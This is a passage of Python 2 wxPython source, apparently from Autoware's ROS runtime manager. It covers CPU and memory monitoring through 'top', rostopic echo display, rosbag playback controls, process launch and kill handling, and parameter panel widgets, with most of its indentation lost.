#print '@', cam_id, cam_id_obj.GetValue()
self.OnLaunchKill_obj(cam_id_obj)
#
# Simulation Tab
#
def rosbag_info_hook(self, v):
if not v:
return
th_start(self.rosbag_info_hook_th, {'v':v} )
def rosbag_info_hook_th(self, ev, v): # thread
err = subprocess.STDOUT
s = subprocess.check_output([ 'rosbag', 'info', v ], stderr=err).strip()
wx.CallAfter(self.label_rosbag_info.SetLabel, s)
wx.CallAfter(self.label_rosbag_info.GetParent().FitInside)
#
# Data Tab
#
#
	# Status tab
#
def info_col(self, v, v_yellow, v_red, col_normal, col_red):
if v < v_yellow:
return col_normal
if v < v_red:
(nr,ng,nb) = col_normal
(rr,rg,rb) = col_red
return ( (nr+rr)/2, (ng+rg)/2, (nb+rb)/2 )
return col_red
def mem_kb_info(self):
lst = subprocess.check_output(['free']).strip().split('\n')[2].split()[2:4]
used = int(lst[0])
free = int(lst[1])
return (used + free, used)
def toprc_create(self):
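		# run an interactive 'top' on a pty and send the keystrokes '1' (per-CPU rows),
		# 'c' (full command line), 'W' (write ~/.toprc) and 'q' (quit) so that the
		# batch-mode 'top' used by top_cmd_th later reports per-core usage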
(child_pid, fd) = pty.fork()
if child_pid == 0: # child
os.execvp('top', ['top'])
else: #parent
sec = 0.2
for s in ['1', 'c', 'W', 'q']:
time.sleep(sec)
os.write(fd, s)
def toprc_setup(self, toprc, backup):
if os.path.exists(toprc):
os.rename(toprc, backup)
self.toprc_create()
def toprc_restore(self, toprc, backup):
os.remove(toprc)
if os.path.exists(backup):
os.rename(backup, toprc)
# top command thread
def top_cmd_th(self, ev, setting, cpu_ibls, mem_ibl, toprc, backup):
interval = setting.get('interval', 3)
alert_level = setting.get('alert_level', {})
rate_per_cpu = alert_level.get('rate_per_cpu', 80)
rate_per_cpu_yellow = alert_level.get('rate_per_cpu_yellow', 80)
rate_cpu = alert_level.get('rate_cpu', 80)
rate_mem = alert_level.get('rate_mem', 80)
rate_mem_yellow = alert_level.get('rate_mem_yellow', 80)
for ibl in cpu_ibls:
ibl.lmt_bar_prg = rate_per_cpu
mem_ibl.lmt_bar_prg = rate_mem
alerted = False
cpu_n = psutil.NUM_CPUS
while not ev.wait(interval):
s = subprocess.check_output(['sh', '-c', 'env COLUMNS=512 top -b -n 2 -d 0.1']).strip()
i = s.rfind('\ntop -') + 1
s = s[i:]
wx.CallAfter(self.label_top_cmd.SetLabel, s)
wx.CallAfter(self.label_top_cmd.GetParent().FitInside)
k = '%Cpu'
fv_sum = 0
i = 0
for t in s.split('\n'):
if t[:len(k)] != k:
continue
lst = t[1:].split()
v = lst[1] if lst[1] != ':' else lst[2]
if v[0] == ':':
v = v[1:]
fv = str_to_float(v)
col = self.info_col(fv, rate_per_cpu_yellow, rate_per_cpu, (64,64,64), (200,0,0))
if i < cpu_n:
ibl = cpu_ibls[i]
wx.CallAfter(ibl.lb_set, v+'%', col)
wx.CallAfter(ibl.bar_set, int(fv))
fv_sum += fv
i += 1
k = 'KiB Mem:'
(total, used) = self.mem_kb_info()
rate = 100 * used / total
for u in [ 'KB', 'MB', 'GB', 'TB' ]:
if total <= 10 * 1024 or used <= 10:
break
total /= 1024
used /= 1024
col = self.info_col(rate, rate_mem_yellow, rate_mem, (64,64,64), (200,0,0))
tx = str(used) + u + '/' + str(total) + u + '(' + str(rate) + '%)'
wx.CallAfter(mem_ibl.lb_set, tx, col)
wx.CallAfter(mem_ibl.bar_set, rate)
is_alert = (fv_sum >= rate_cpu * cpu_n) or rate >= rate_mem
# --> for test
if os.path.exists('/tmp/alert_test_on'):
is_alert = True
if os.path.exists('/tmp/alert_test_off'):
is_alert = False
# <-- for test
if is_alert and not alerted:
thinf = th_start(self.alert_th, {'bgcol':(200,50,50)})
alerted = True
if not is_alert and alerted:
th_end(thinf)
alerted = False
# top5
i = s.find('\n\n') + 2
lst = s[i:].split('\n')
hd = lst[0]
top5 = lst[1:1+5]
i = hd.rfind('COMMAND')
cmds = [ line[i:].split(' ')[0] for line in top5 ]
i = hd.find('%CPU')
loads = [ line[i-1:].strip().split(' ')[0] for line in top5 ]
for (lb, cmd, load) in zip(self.lb_top5, cmds, loads):
col = self.info_col(str_to_float(load), rate_per_cpu_yellow, rate_per_cpu, (64,64,64), (200,0,0))
wx.CallAfter(lb.SetForegroundColour, col)
wx.CallAfter(lb.SetLabel, cmd + ' (' + load + ' %CPU)')
self.toprc_restore(toprc, backup)
def alert_th(self, bgcol, ev):
wx.CallAfter(self.RequestUserAttention)
c = bgcol
o = wx.NullColour
while not ev.wait(0.5):
for col in [ c, o, c, o, c, o ]:
wx.CallAfter(self.set_bg_all_tabs, col)
time.sleep(0.05)
def log_th(self, file, que, ev):
while not ev.wait(0):
s = file.readline()
if not s:
break
que.put(s)
def logout_th(self, que, interval, tc, ev):
if que == self.log_que_stdout or que == self.log_que_stderr:
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
self.log_que.put(s)
if interval <= 0:
continue
ckbox = self.checkbox_stdout if que == self.log_que_stdout else self.checkbox_stderr
if ckbox.GetValue():
self.log_que_show.put( cut_esc(s) )
else: # == self.log_que
f = None
path = self.status_dic.get('log_path')
is_syslog = (path == 'syslog')
if is_syslog:
ident = sys.argv[0].split('/')[-1]
syslog.openlog(ident, syslog.LOG_PID | syslog.LOG_CONS)
elif path:
path = os.path.expandvars(os.path.expanduser(path))
f = open(path, 'a') if path else None
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
print s.strip()
sys.stdout.flush()
s = cut_esc(s)
if is_syslog:
syslog.syslog(s)
elif f:
f.write(s)
f.flush()
if is_syslog:
syslog.closelog()
if f:
f.close()
def logshow_th(self, que, interval, tc, ev):
while not ev.wait(interval):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
wx.CallAfter(append_tc_limit, tc, s)
# que clear
if self.checkbox_stdout.GetValue() is False and \
self.checkbox_stderr.GetValue() is False and \
que.qsize() > 0:
que_clear(que)
wx.CallAfter(tc.Clear)
#
# for Topics tab
#
def OnRefreshTopics(self, event):
self.refresh_topics_list()
def refresh_topics_list(self):
lst = subprocess.check_output([ 'rostopic', 'list' ]).strip().split('\n')
panel = self.panel_topics_list
szr = self.sizer_topics_list
for obj in self.topics_list:
szr.Remove(obj)
obj.Destroy()
self.topics_list = []
for topic in lst:
obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, topic, '')
self.Bind(wx.EVT_HYPERLINK, self.OnTopicLink, obj)
szr.Add(obj, 0, wx.LEFT, 4)
fix_link_color(obj)
self.topics_list.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
# info clear
lb = self.label_topics_info
lb.SetLabel('')
# echo clear
self.topics_proc_th_end()
# wait que clear
while self.topics_echo_que.qsize() > 0:
time.sleep(0.1)
tc = self.text_ctrl_topics_echo
tc.Enable(False)
wx.CallAfter(tc.Clear)
wx.CallAfter(tc.Enable, True)
self.topics_echo_sum = 0
self.topic_echo_curr_topic = None
def OnEcho(self, event):
if self.checkbox_topics_echo.GetValue() and self.topic_echo_curr_topic:
self.topics_proc_th_start(self.topic_echo_curr_topic)
else:
self.topics_proc_th_end()
def OnTopicLink(self, event):
obj = event.GetEventObject()
topic = obj.GetLabel()
self.topic_echo_curr_topic = topic
# info
info = subprocess.check_output([ 'rostopic', 'info', topic ]).strip()
lb = self.label_topics_info
lb.SetLabel(info)
lb.GetParent().FitInside()
# echo
self.topics_proc_th_end()
if self.checkbox_topics_echo.GetValue():
self.topics_proc_th_start(topic)
def topics_proc_th_start(self, topic):
out = subprocess.PIPE
err = subprocess.STDOUT
self.topics_echo_proc = psutil.Popen([ 'rostopic', 'echo', topic ], stdout=out, stderr=err)
self.topics_echo_thinf = th_start(self.topics_echo_th)
def topics_proc_th_end(self):
thinf = self.topics_echo_thinf
if thinf:
th_end(thinf)
self.topics_echo_thinf = None
proc = self.topics_echo_proc
if proc:
terminate_children(proc)
terminate(proc)
#proc.wait()
self.topics_echo_proc = None
def topics_echo_th(self, ev):
if not self.topics_echo_proc:
return
file = self.topics_echo_proc.stdout
fl = fcntl.fcntl(file.fileno(), fcntl.F_GETFL)
fcntl.fcntl(file.fileno(), fcntl.F_SETFL, fl | os.O_NONBLOCK)
while not ev.wait(0):
try:
s = file.read(1)
except:
continue
if not s:
break
if self.checkbox_topics_echo.GetValue():
self.topics_echo_que.put(s)
que_clear(self.topics_echo_que)
def topics_echo_show_th(self, ev):
que = self.topics_echo_que
interval = self.topics_dic.get('gui_update_interval_ms', 100) * 0.001
chars_limit = self.topics_dic.get('gui_chars_limit', 10000)
tc = self.text_ctrl_topics_echo
while not ev.wait(interval):
qsz = que.qsize()
if qsz <= 0:
continue
if qsz > chars_limit:
over = qsz - chars_limit
for i in range(over):
try:
que.get(timeout=1)
except Queue.Empty:
break
qsz = chars_limit
arr = []
for i in range(qsz):
try:
s = que.get(timeout=1)
except Queue.Empty:
s = ''
arr.append(s)
s = ''.join(arr)
self.topics_echo_sum += len(s)
rm_chars = 0
if self.topics_echo_sum > chars_limit:
rm_chars = self.topics_echo_sum - chars_limit
self.topics_echo_sum = chars_limit
if self.checkbox_topics_echo.GetValue():
wx.CallAfter(append_tc_limit, tc, s, rm_chars)
#
# Common Utils
#
def set_param_panel(self, obj, parent):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
panel = ParamPanel(parent, frame=self, pdic=pdic, gdic=gdic, prm=prm)
sizer_wrap((panel,), wx.VERTICAL, 0, wx.EXPAND, 0, parent)
k = 'ext_toggle_enables'
gdic[ k ] = gdic.get(k, []) + [ panel ]
def obj_to_varpanel(self, obj, var_name):
gdic = self.obj_to_gdic(obj, {})
return gdic.get(var_name, {}).get('var')
def obj_to_varpanel_tc(self, obj, var_name):
vp = self.obj_to_varpanel(obj, var_name)
return vp.tc if vp and vp.tc else None
def OnConfig(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def add_params(self, params):
for prm in params:
if 'topic' in prm and 'msg' in prm:
klass_msg = globals()[ prm['msg'] ]
prm['pub'] = rospy.Publisher(prm['topic'], klass_msg, latch=True, queue_size=10)
self.params += params
def gdic_get_1st(self, dic):
gdic = dic.get('gui', {})
gdic['update_func'] = self.update_func
return gdic
def add_cfg_info(self, cfg_obj, obj, name, pdic, gdic, run_disable, prm):
self.config_dic[ cfg_obj ] = { 'obj':obj , 'name':name , 'pdic':pdic , 'gdic':gdic,
'run_disable':run_disable , 'param':prm }
def get_param(self, prm_name):
return next( (prm for prm in self.params if prm['name'] == prm_name), None)
def get_var(self, prm, var_name, def_ret=None):
return next( (var for var in prm.get('vars') if var.get('name') == var_name), def_ret)
def obj_to_cmd_dic(self, obj):
return next( (cmd_dic for cmd_dic in self.all_cmd_dics if obj in cmd_dic), None)
def obj_to_cmd_dic_cmd_proc(self, obj):
cmd_dic = self.obj_to_cmd_dic(obj)
if cmd_dic is None:
return (None, None, None)
(cmd, proc) = cmd_dic.get(obj, (None, None))
return (cmd_dic, cmd, proc)
def OnLaunchKill(self, event):
self.OnLaunchKill_obj(event.GetEventObject())
def OnLaunchKill_obj(self, obj):
self.alias_sync(obj)
obj = self.alias_grp_top_obj(obj)
v = obj.GetValue()
add_args = self.obj_to_add_args(obj, msg_box=v) # no open dialog at kill
if add_args is False:
set_val(obj, not v)
return
(cmd_dic, _, proc_bak) = self.obj_to_cmd_dic_cmd_proc(obj)
self.launch_kill_proc(obj, cmd_dic, add_args=add_args)
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc != proc_bak:
self.toggle_enable_obj(obj)
if proc:
self.update_proc_cpu(obj)
def OnRosbagPlay(self, event):
obj = event.GetEventObject()
play = self.button_play_rosbag_play
stop = self.button_stop_rosbag_play
pause = self.button_pause_rosbag_play
(_, _, prm) = self.obj_to_pdic_gdic_prm(play)
var = self.get_var(prm, 'sim_time', {})
if obj == play:
var['v'] = True
self.OnLaunchKill_obj(play)
button_color_change(play)
set_val(stop, False)
set_val(pause, False)
elif obj == stop:
set_val(stop, True)
set_val(play, False)
set_val(pause, False)
var['v'] = False
self.OnLaunchKill_obj(play)
button_color_change(stop)
elif obj == pause:
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(play)
if proc:
proc.stdin.write(' ')
def OnFtrace(self, event):
obj = event.GetEventObject()
cmd = 'rosrun runtime_manager ftrace.py'
v = obj.GetValue()
self.ftrace_proc_ = self.launch_kill(v, cmd,
None if v else self.ftrace_proc_, obj=obj)
def stdout_file_search(self, file, k):
s = ''
while True:
c = file.read(1)
if not c:
return None
if c != '\r' and c != '\n':
s += c
continue
s = s.strip()
if k in s:
break
s = ''
i = s.find(k) + len(k)
return s[i:]
# thread
def point_cloud_progress_bar(self, file, ev):
obj = self.button_point_cloud
(pdic, _, _) = self.obj_to_pdic_gdic_prm(obj)
n = len(pdic.get('path_pcd', '').split(','))
if n == 0:
return
i = 0
while not ev.wait(0):
s = self.stdout_file_search(file, 'load ')
if not s:
break
err_key = 'failed '
if s[:len(err_key)] != err_key:
i += 1
else:
i -= 1
print s
wx.CallAfter(self.label_point_cloud_bar.set, 100 * i / n)
wx.CallAfter(self.label_point_cloud_bar.clear)
# thread
def rosbag_play_progress_bar(self, file, ev):
while not ev.wait(0):
s = self.stdout_file_search(file, 'Duration:')
if not s:
break
lst = s.split()
pos = str_to_float(lst[0])
# lst[1] is '/'
total = str_to_float(lst[2])
if total == 0:
continue
prg = int(100 * pos / total + 0.5)
pos = str(int(pos))
total = str(int(total))
wx.CallAfter(self.label_rosbag_play_bar.set, prg)
wx.CallAfter(self.label_rosbag_play_pos.SetLabel, pos)
wx.CallAfter(self.label_rosbag_play_total.SetLabel, total)
wx.CallAfter(self.label_rosbag_play_bar.clear)
wx.CallAfter(self.label_rosbag_play_pos.SetLabel, '')
wx.CallAfter(self.label_rosbag_play_total.SetLabel, '')
def alias_sync(self, obj, v=None):
en = None
if getattr(obj, 'IsEnabled', None):
(key, en) = enables_get_last(obj)
if not key:
en = obj.IsEnabled()
grp = self.alias_grp_get(obj)
if getattr(obj, 'GetValue', None):
v = obj.GetValue()
for o in grp:
if o is obj:
continue
if en is not None and o.IsEnabled() != en and not self.is_toggle_button(o):
if key:
enable_set(o, key, en)
else:
o.Enable(en)
if v is not None and getattr(o, 'SetValue', None):
set_val(o, v)
if getattr(o, 'SetInsertionPointEnd', None):
o.SetInsertionPointEnd()
def alias_grp_top_obj(self, obj):
return get_top(self.alias_grp_get(obj), obj)
def alias_grp_get(self, obj):
return next( (grp for grp in self.alias_grps if obj in grp), [])
def create_tree(self, parent, items, tree, item, cmd_dic):
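		# recursively build a CustomTreeCtrl from the YAML item hierarchy ('subs');
		# items with a 'cmd' entry become checkbox nodes registered in cmd_dic, and
		# config hyperlinks ([sys] / [app]) are attached to each item via new_link()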
name = items.get('name', '')
if tree is None:
style = wx.TR_HAS_BUTTONS | wx.TR_NO_LINES | wx.TR_HIDE_ROOT | wx.TR_DEFAULT_STYLE | wx.SUNKEN_BORDER
tree = CT.CustomTreeCtrl(parent, wx.ID_ANY, agwStyle=style)
item = tree.AddRoot(name, data=tree)
tree.Bind(wx.EVT_MOTION, self.OnTreeMotion)
else:
ct_type = 1 if 'cmd' in items else 0 # 1:checkbox type
item = tree.AppendItem(item, name, ct_type=ct_type)
if 'desc' in items:
item.SetData(items.get('desc'))
if 'cmd' in items:
cmd_dic[item] = (items['cmd'], None)
pdic = self.load_dic_pdic_setup(name, items)
pnl = wx.Panel(tree, wx.ID_ANY)
add_objs = []
self.new_link(item, name, pdic, self.sys_gdic, pnl, 'sys', 'sys', add_objs)
gdic = self.gdic_get_1st(items)
if 'param' in items:
self.new_link(item, name, pdic, gdic, pnl, 'app', items.get('param'), add_objs)
else:
self.add_cfg_info(item, item, name, None, gdic, False, None)
szr = sizer_wrap(add_objs, wx.HORIZONTAL, parent=pnl)
szr.Fit(pnl)
tree.SetItemWindow(item, pnl)
for sub in items.get('subs', []):
self.create_tree(parent, sub, tree, item, cmd_dic)
return tree
def new_link(self, item, name, pdic, gdic, pnl, link_str, prm_name, add_objs):
lkc = None
if 'no_link' not in gdic.get('flags', []):
lkc = wx.HyperlinkCtrl(pnl, wx.ID_ANY, link_str, "")
fix_link_color(lkc)
self.Bind(wx.EVT_HYPERLINK, self.OnHyperlinked, lkc)
if len(add_objs) > 0:
add_objs += [ wx.StaticText(pnl, wx.ID_ANY, ' ') ]
add_objs += [ wx.StaticText(pnl, wx.ID_ANY, '['), lkc, wx.StaticText(pnl, wx.ID_ANY, ']') ]
prm = self.get_param(prm_name)
self.add_cfg_info(lkc if lkc else item, item, name, pdic, gdic, False, prm)
def load_dic_pdic_setup(self, name, dic):
name = dic.get('share_val', dic.get('name', name))
pdic = self.load_dic.get(name, {})
self.load_dic[ name ] = pdic
return pdic
def launch_kill_proc(self, obj, cmd_dic, add_args=None):
if obj not in cmd_dic:
set_val(obj, False)
print('not implemented.')
return
v = obj.GetValue()
(cmd, proc) = cmd_dic[obj]
if not cmd:
set_val(obj, False)
proc = self.launch_kill(v, cmd, proc, add_args, obj=obj)
(cfg_obj, dic) = self.cfg_obj_dic( {'obj':obj} )
if cfg_obj and dic.get('run_disable'):
cfg_obj.Enable(not v)
cmd_dic[obj] = (cmd, proc)
if not v:
self.stat_label_off(obj)
def proc_to_cmd_dic_obj(self, proc):
for cmd_dic in self.all_cmd_dics:
obj = next( (obj for (obj, v) in cmd_dic.items() if proc in v), None)
if obj:
return (cmd_dic, obj)
return (None, None)
def launch_kill(self, v, cmd, proc, add_args=None, sigint=None, obj=None, kill_children=None):
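# v=True: launch cmd (plus add_args) via psutil.Popen and hand its stdout/stderr
# to the configured stdout handler thread (self.log_th by default).
# v=False: terminate proc (and optionally its children), wait for it, and return None.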
msg = None
msg = 'already launched.' if v and proc else msg
msg = 'already terminated.' if not v and proc is None else msg
msg = 'cmd not implemented.' if not cmd else msg
if msg is not None:
print(msg)
return proc
if v:
args = shlex.split(cmd)
if add_args:
args += add_args
print(args) # for debug
f = self.obj_to_gdic(obj, {}).get('stdout_func')
f = eval_if_str(self, f)
f = f if f else self.log_th
out = subprocess.PIPE if f else None
err = subprocess.STDOUT if f else None
if f == self.log_th:
err = subprocess.PIPE
proc = psutil.Popen(args, stdin=subprocess.PIPE, stdout=out, stderr=err)
self.all_procs.append(proc)
if f == self.log_th:
thinf = th_start(f, {'file':proc.stdout, 'que':self.log_que_stdout})
self.all_th_infs.append(thinf)
thinf = th_start(f, {'file':proc.stderr, 'que':self.log_que_stderr})
self.all_th_infs.append(thinf)
elif f:
thinf = th_start(f, {'file':proc.stdout})
self.all_th_infs.append(thinf)
else:
flags = self.obj_to_gdic(obj, {}).get('flags', [])
if sigint is None:
sigint = 'SIGTERM' not in flags
if kill_children is None:
kill_children = 'kill_children' in flags
if kill_children:
terminate_children(proc, sigint)
terminate(proc, sigint)
proc.wait()
if proc in self.all_procs:
self.all_procs.remove(proc)
proc = None
return proc
def roslaunch_to_nodes(self, cmd):
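# Run the given node-listing command and return its output split into lines
# (an empty list on error or empty output).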
try:
s = subprocess.check_output(cmd).strip()
return s.split('\n') if s != '' else []
except subprocess.CalledProcessError:
return []
def set_bg_all_tabs(self, col=wx.NullColour):
add_pnls = [
self,
self.tree_ctrl_0,
self.tree_ctrl_1,
self.tree_ctrl_data ]
for tab in self.all_tabs + add_pnls:
tab.SetBackgroundColour(col)
def get_autoware_dir(self):
dir = rtmgr_src_dir() + '../../../../../../'
return os.path.abspath(dir)
def load_yaml(self, filename, def_ret=None):
return load_yaml(filename, def_ret)
def toggle_enable_obj(self, obj):
objs = []
pfs = [ 'button_play_', 'button_stop_', 'button_pause_',
'button_ref_', 'text_ctrl_' ]
key = self.obj_key_get(obj, pfs)
if key:
objs += self.key_objs_get(pfs, key)
gdic = self.obj_to_gdic(obj, {})
objs += [ eval_if_str(self, e) for e in gdic.get('ext_toggle_enables', []) ]
self.toggle_enables(objs)
def toggle_enables(self, objs):
for obj in objs:
if getattr(obj, 'IsEnabled', None):
en = enables_get(obj, 'toggle', obj.IsEnabled())
enables_set(obj, 'toggle', not en)
self.alias_sync(obj)
def is_toggle_button(self, obj):
return self.name_get(obj).split('_')[0] == 'button' and getattr(obj, 'GetValue', None)
def obj_name_split(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return (None, None)
return next( ( ( name[:len(pf)], name[len(pf):] ) for pf in pfs if name[:len(pf)] == pf ), None)
def obj_key_get(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return None
return next( (name[len(pf):] for pf in pfs if name[:len(pf)] == pf), None)
def key_objs_get(self, pfs, key):
return [ self.obj_get(pf + key) for pf in pfs if self.obj_get(pf + key) ]
def name_get(self, obj):
return next( (nm for nm in dir(self) if getattr(self, nm) is obj), None)
def name_get_cond(self, obj, cond=(lambda s : True), def_ret=None):
return next( (nm for nm in dir(self) if cond(nm) and getattr(self, nm) is obj), def_ret)
def val_get(self, name):
obj = self.obj_get(name)
if obj is None:
return None
return obj.GetValue() if getattr(obj, 'GetValue', None) else None
def obj_get(self, name):
return getattr(self, name, None)
def gdic_dialog_type_chk(gdic, name):
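# Decide whether the named var should be shown for the current dialog type,
# based on the '*_dialog_only' and '*_dialog_allow' lists in gdic.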
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
tail = '_dialog_only'
lst = [ (k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail ]
only_chk = next( (False for (k,type) in lst if type != dlg_type and name in gdic.get(k, [])), True)
tail = '_dialog_allow'
lst = [ (k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail ]
allow_chk = next( (False for (k,type) in lst if type == dlg_type and name not in gdic.get(k, [])), True)
return only_chk and allow_chk
def gdic_dialog_name_get(gdic):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
return gdic.get(dlg_type + '_dialog', gdic.get('dialog', 'MyDialogParam') )
class ParamPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.frame = kwds.pop('frame')
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
wx.Panel.__init__(self, *args, **kwds)
self.gdic['param_panel'] = self
obj = self.frame.cfg_prm_to_obj( {'pdic':self.pdic, 'gdic':self.gdic, 'param':self.prm} )
(_, _, proc) = self.frame.obj_to_cmd_dic_cmd_proc(obj)
hszr = None
self.vps = []
self.tmp_msg = None
szr = wx.BoxSizer(wx.VERTICAL)
topic_szrs = (None, None)
vars = self.prm.get('vars')
if self.gdic.get('show_order'):
var_lst = lambda name, vars : [ var for var in vars if var.get('name') == name ]
vars = reduce( lambda lst, name : lst + var_lst(name, vars), self.gdic.get('show_order'), [] )
for var in vars:
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
bak_stk_push(gdic_v, 'func')
if gdic_v.get('func'):
continue
v = self.pdic.get(name, var.get('v'))
vp = VarPanel(self, var=var, v=v, update=self.update)
vp.setup_tooltip()
self.vps.append(vp)
gdic_v['var'] = vp
gdic_v['func'] = vp.get_v
prop = gdic_v.get('prop', 0)
border = gdic_v.get('border', 0)
flag = wx_flag_get(gdic_v.get('flags', []))
do_category = 'no_category' not in gdic_v.get('flags', [])
if do_category and self.in_msg(var):
bak = (szr, hszr)
(szr, hszr) = topic_szrs
if szr is None:
szr = static_box_sizer(self, 'topic : ' + self.prm.get('topic'))
bak[0].Add(szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = szr
if vp.is_nl():
hszr = None if hszr else hszr
flag |= wx.EXPAND
else:
if hszr is None:
hszr = wx.BoxSizer(wx.HORIZONTAL)
szr.Add(hszr, 0, wx.EXPAND)
flag |= wx.ALIGN_CENTER_VERTICAL
targ_szr = hszr
if do_category and 'rosparam' in var:
rp_szr = static_box_sizer(self, 'rosparam : ' + var.get('rosparam'))
targ_szr.Add(rp_szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = rp_szr
user_category = gdic_v.get('user_category')
if user_category is not None and hszr:
user_szr = static_box_sizer(self, user_category, orient=wx.HORIZONTAL)
(flgs, bdr) = gdic_v.get('user_category_add', [ [], 0 ])
targ_szr.Add(user_szr, 0, wx_flag_get(flgs), bdr)
targ_szr = hszr = user_szr
targ_szr.Add(vp, prop, flag, border)
if 'nl' in gdic_v.get('flags', []):
hszr = None
if do_category and self.in_msg(var):
topic_szrs = (szr, hszr)
(szr, hszr) = bak
if 'hline' in gdic_v.get('flags', []) and hszr is None:
szr.Add(wx.StaticLine(self, wx.ID_ANY), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, 4)
if not self.in_msg(var) and var.get('rosparam'):
k = 'ext_toggle_enables'
self.gdic[ k ] = self.gdic.get(k, []) + [ vp ]
enables_set(vp, 'toggle', proc is None)
if 'disable' in gdic_v.get('flags', []):
vp.Enable(False)
if 'hide' in gdic_v.get('flags', []):
vp.Hide()
self.SetSizer(szr)
if 'no_init_update' not in self.prm.get('flags', []):
self.update()
def get_gdic_v_and_chk_enable(self, var_name):
gdic_v = dic_getset(self.gdic, var_name, {})
if 'panel' in gdic_v and dic_eval_if_str(self.frame, gdic_v, 'panel') != self.GetParent():
return None
return gdic_v
def update(self, var=None):
update_func = self.gdic.get('update_func')
if update_func:
self.gdic['update_func_arg_var'] = var
update_func(self.pdic, self.gdic, self.prm)
def detach_func(self):
for var in self.prm.get('vars'):
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
if 'func' in gdic_v:
bak_stk_pop(gdic_v, 'func')
vp = gdic_v.get('var')
lst_remove_once(self.gdic.get('ext_toggle_enables', []), vp)
def in_msg(self, var):
if 'topic' not in self.prm or 'msg' not in self.prm:
return False
if self.tmp_msg is None:
klass_msg = globals().get( self.prm.get('msg') )
if klass_msg is None:
return False
self.tmp_msg = klass_msg()
(obj, attr) = msg_path_to_obj_attr(self.tmp_msg, var.get('name'))
return obj and attr in obj.__slots__
class VarPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.var = kwds.pop('var')
v = kwds.pop('v')
self.update = kwds.pop('update')
wx.Panel.__init__(self, *args, **kwds)
self.min = self.var.get('min')
self.max = self.var.get('max')
self.has_slider = self.min is not None and self.max is not None
self.lb = None
label = self.var.get('label', '')
self.kind = self.var.get('kind')
if self.kind == 'radio_box':
choices = self.var.get('choices', [])
style = wx.RA_SPECIFY_COLS if self.var.get('choices_style') == 'h' else wx.RA_SPECIFY_ROWS
self.obj = wx.RadioBox(self, wx.ID_ANY, label, choices=choices, majorDimension=0, style=style)
self.choices_sel_set(v)
self.Bind(wx.EVT_RADIOBOX, self.OnUpdate, self.obj)
return
if self.kind == 'menu':
choices = self.var.get('choices', [])
self.obj = wx.Choice(self, wx.ID_ANY, choices=choices)
self.choices_sel_set(v)
self.Bind(wx.EVT_CHOICE, self.OnUpdate, self.obj)
if label:
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
sizer_wrap((self.lb, self.obj), wx.HORIZONTAL, 0, flag, 4, self)
return
if self.kind == 'checkbox':
self.obj = wx.CheckBox(self, wx.ID_ANY, label)
self.obj.SetValue(v)
self.Bind(wx.EVT_CHECKBOX, self.OnUpdate, self.obj)
return
if self.kind == 'checkboxes':
item_n = dic_eval_if_str(self, self.var, 'item_n', 1)
self.obj = Checkboxes(self, item_n, label)
self.obj.set(v)
for box in self.obj.boxes:
self.obj.Bind(wx.EVT_CHECKBOX, self.OnUpdate, box)
return
if self.kind == 'toggle_button':
self.obj = wx.ToggleButton(self, wx.ID_ANY, label)
set_val(self.obj, v)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnUpdate, self.obj)
button_color_hdr_setup(self.obj)
return
if self.kind == 'hide':
self.Hide()
return
szr = wx.BoxSizer(wx.HORIZONTAL)
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
szr.Add(self.lb, 0, flag, 4)
if self.kind == 'path':
v = str(v)
v = path_expand_cmd(v)
v = os.path.expandvars(os.path.expanduser(v))
style = wx.TE_PROCESS_ENTER + wx_flag_get( self.var.get('str_flags', []) )
self.tc = wx.TextCtrl(self, wx.ID_ANY, str(v), style=style)
self.Bind(wx.EVT_TEXT_ENTER, self.OnUpdate, self.tc)
if self.kind in ('num', None):
if self.has_slider:
self.w = self.max - self.min
vlst = [ v, self.min, self.max, self.var['v'] ]
self.is_float = len( [ v_ for v_ in vlst if type(v_) is not int ] ) > 0
self.int_max = 1000 if self.is_float else self.max
self.int_min = 0 if self.is_float else self.min
self.slider = wx.Slider(self, wx.ID_ANY, self.get_int_v(), self.int_min, self.int_max)
self.Bind(wx.EVT_COMMAND_SCROLL, self.OnScroll, self.slider)
self.slider.SetMinSize((82, 27))
szr.Add(self.slider, 1, wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, 4)
else:
self.is_float = type(self.var['v']) is not int
self.tc.SetMinSize((40,27))
flag = wx.ALIGN_CENTER_VERTICAL
prop = 1 if self.kind == 'path' or self.kind == 'str' else 0
szr.Add(self.tc, prop, flag, 4)
if self.kind == 'path':
self.ref = wx.Button(self, wx.ID_ANY, 'Ref')
self.Bind(wx.EVT_BUTTON, self.OnRef, self.ref)
button_color_hdr_setup(self.ref)
self.ref.SetMinSize((40,29))
szr.Add(self.ref, 0, flag, 4)
if self.has_slider or self.kind == 'num':
vszr = wx.BoxSizer(wx.VERTICAL)
vszr.Add( self.create_bmbtn("inc.png", self.OnIncBtn) )
vszr.Add( self.create_bmbtn("dec.png", self.OnDecBtn) )
